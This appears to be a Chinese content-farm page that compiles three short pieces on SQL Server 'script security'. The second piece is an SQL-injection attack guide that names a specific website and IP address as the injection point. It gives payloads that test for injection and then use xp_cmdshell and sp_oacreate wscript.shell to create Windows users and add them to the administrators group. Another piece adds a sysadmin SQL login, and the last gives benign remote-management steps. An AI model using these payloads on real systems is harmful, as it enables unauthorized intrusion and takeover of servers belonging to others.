命令行下添加SQL用户的方法脚本安全
“我也不知道”通过精心收集,向本站投稿了3篇命令行下添加SQL用户的方法脚本安全,下面是小编为大家整理后的命令行下添加SQL用户的方法脚本安全,仅供参考,欢迎大家阅读,希望可以帮助到有需要的朋友。
篇1:命令行下添加SQL用户的方法脚本安全
需要有管理员权限,在命令下先建立一个c:\test.qry文件,内容如下:
exec master.dbo.sp_addlogin test,123
EXEC sp_addsrvrolemember 'test, 'sysadmin'
然后在DOS下执行:cmd.exe /c isql -E /U alma /P /i c:\test.qry
篇2:SA权限添加管理员帐号与命令行下添加SQL用户的方法漏洞预警
注入点:www.enzymotec.com/Page.aspcc=0102041102 IP:192.117.122.145 以色列 inurl:asp
具体脚本命令:
1.判断是否有注入;and 1=1 ;and 1=2
;and user_name='dbo' 判断当前系统的连接用户是不是sa
2.添加系统的管理员
;exec master.dbo.xp_cmdshell 'net user jiaozhu jiaozhu /add';--
;exec master.dbo.xp_cmdshell 'net localgroup administrators jiaozhu /add';--
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c
这段命令是通过SQL执行系统命令的
例如:
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user jiss 111 /add'
这段命令是通过SQL执行系统命令的
命令行下添加SQL用户的方法
需要有管理员权限,在命令下先建立一个c:\test.qry文件,内容如下:
exec master.dbo.sp_addlogin test,123
EXEC sp_addsrvrolemember 'test, 'sysadmin'
然后在DOS下执行:cmd.exe /c isql -E /U alma /P /i c:\test.qry
篇3:远程管理SQL数据的方法脚本安全
1、在的你计算机上安装sql server2000数据库的软件(注意:相同版本的数据库系统)
2、点击开始 -- 程序 -- Microsoft SQL Server -- 客户端网络实用工具 -- 另名 -- 点击添加 --- 网络库选取TCP/IP;服务器别名:数据库服务器的IP;服务器名称:数据库服务器的IP;端口默认1433 -- 确定
3、点击开始 -- 程序 -- Microsoft SQL Server -- 企业管理器 -- Mouse点 Microsoft SQL Servers -- mouse右键点 Sql Server 组;点新的sql server 注册.... -- 下一步 -- 增加主机IP,下一步---选“系统管理员给我分配的SQL Server登录信息....”.
下一步 -- 登录名:用户名、密码:密码、下一步 -- ……
4、联接成功后;请您找到您的数据库;你就可管理你的数据库,
远程管理SQL数据的方法脚本安全
,
注:不要越权。一般情况下你是只能看到别的数据库的名称而没有管理权限!!!
【命令行下添加SQL用户的方法脚本安全】相关文章:






文档为doc格式